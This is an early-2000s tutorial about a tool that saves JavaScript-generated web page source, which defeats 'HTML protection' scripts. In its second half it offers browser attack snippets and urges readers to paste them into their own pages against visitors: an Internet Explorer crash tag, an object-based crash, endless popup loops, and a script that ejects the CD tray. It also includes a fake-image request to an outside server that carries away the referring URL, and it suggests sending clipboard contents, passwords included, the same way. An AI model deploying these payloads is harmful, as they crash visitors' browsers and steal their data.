Javascript protections busting
v 0.1 May 2003 by Mordred
|
Javascript protections busting v 0.1 May 2003 by Mordred |
The Sourcerer alows you to save the source of those annoying web sites that use JavaScript to generate content. Ordinary browsers can save only the source of the source, for example let's suppose you have a page which says:
<SCRIPT language=javascript><!--
document.write("Hello world");//-->
</SCRIPT>
In your browser you will see only the text "Hello world", but if you save the page's source, you will see only this piece of script. Because of this, some really bad people (you may think it's just funny, but, well, it's not) decided they can make money on the backs of the others, selling them stupid "HTML protection" software, which is more or less a javascript which decodes the actual source on the fly.
Here's what we do. Go to http://www.blmodirect.com/letters/b5012protected.htm (or try the local copy provided in the package if that one is down). Rightclick on the browser window, and choose "View source". Mm, yeah ... tons of crap. Now open the same URL in Sourcerer (copy & paste the URL - that's the only way which is anyway the fastest, so get used to it). Choose Save source and open the result in your text editor. That's about how you use Sourcerer. If you're playing at +Mala's, don't forget to try it on the third riddle :)
If you have a large collection of files to convert (you downloaded them with wGet of course,
certainly NOT by hand), you can automate their conversion using the commandline:
Sourcerer.exe "file://localhost/c:/dir with spaces/index.html" c:\no_spaces_therefore_no_quotes\1.html Sourcerer.exe http://www.searchlores.org index.htm
IMPORTANT! Please, use your brain. Sourcerer uses an IE WebBrowser control, which means
that it is effectively an IE copy. Don't use it for browsing, or you'll get hacked, spammed, flooded
or made to look stupid in any other way. Proof? (Btw, do copy these snippets in your html pages to annoy
the bozos that use IE, or better, find
fresh
ones
,or
learn
to write such scripts on your own.)
<input type crash>Crashes IE, details | |
<object ID=crash CLASSID='CLSID:00022613-0000-0000-C000-000000000046'> </object>Crashes IE, details | |
<script>while(1)w=window.open('','')</script>
Opens windows in a loop, not a major pain in the ass as there is a limit to the number of windows,
and the IEXPLORE task can be easily killed
| |
<script>while(1) {
alert('1');
document.write("<script>while(1)w=window.open('','')</sc"+"ript>")}
</script>
Improved example: not so easily killed
| |
<SCRIPT LANGUAGE="VBScript"><!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
--></SCRIPT>
And one for comic relief - eject your cd tray
|
1)<SCRIPT LANGUAGE="JavaScript">
2) document.write("<I>Updated </I>");
3) document.write("<font color=black>");
4) document.write(UpdateDate(5,7,2003));
5) document.write("</font></i>");
6)</script>
Let's follow what it does:<script language=javascript>
document.write("<img src='http://myserver.com/my_fake_image_script.gif?" + document.refferer + "'>");
</script>
This means that we include in the page's source an image tag, and the image source we provide
is in fact a masquaraded SERVER-SIDE script, which, when your
browser blindly goes to download that image, will receive the reffering URL. Or the screen
width. Or the clipboard. Or you can make the page periodically check (while it is active) if
there's something new in the clipboard and send it to your server.
Do you copy and paste your passwords?
Dim doc As HTMLDocument Set doc = Browser.Document ... s = doc.documentElement.outerHTML
